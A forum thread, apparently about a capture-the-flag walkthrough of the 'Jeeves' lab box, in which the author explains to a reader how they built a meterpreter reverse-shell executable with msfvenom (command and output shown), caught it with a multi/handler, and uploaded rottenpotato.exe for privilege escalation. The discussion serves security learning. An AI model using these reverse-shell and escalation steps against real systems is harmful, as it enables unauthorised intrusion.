@onlyamedic said:
@witness2pro said:
Thanks for writing this walkthrough. This is the only walkthrough that talks about using Windows Exploit Suggester that I can find so I am keen to learn how to make it work.
No problem! Thanks for reading.
* What code was used to make 8383.exe ?
That is a meterpreter reverse shell windows/meterpreter/reverse_tcp generated with the tool msfvenom. This tool is installed by default on kali & is a component of the metasploit framework.
Example command:
root@dastinia:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.151 LPORT=31337 -f exe > win_meterp_31337.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
- In the jobs section in msfconsole, you have
1 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.14.32:8383
Is that needed for getting to root?
Not necessarily, I opted to use the metasploit framework to catch shells for this box for convenience's sake. In the metasploit framework the jobs command lets you know what tasks the framework is running in the background. See this link: Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec
- How did you get meterpreter to upload this?
meterpreter > upload /opt/serve/windows/priv/rottenpotato.exe
I mean, how did you arrive at meterpreter? What payload did you use to arrive at meterpreter?
If you have a meterpreter shell you can upload files from your local system to the remote victim machine with the upload command. (see this link Metasploit Unleashed - Free Online Ethical Hacking Course | OffSec)
To get that meterpreter shell, I uploaded & executed the 8383.exe executable which was a meterpreter shell that I generated with msfvenom from before.
Let me know if that helps.
Thanks a million for such a helpful and fast response. You are the best. And yes, I have looked at almost 20 Jeeves walkthroughs and yours is the only one that bothers with using Windows Exploit Suggester.
Even IppSec failed to explain why he did not bother with Windows Exploit Suggester or equivalent, a tool that I thought is one of the first tools that comes to mind when dealing with Windows boxes.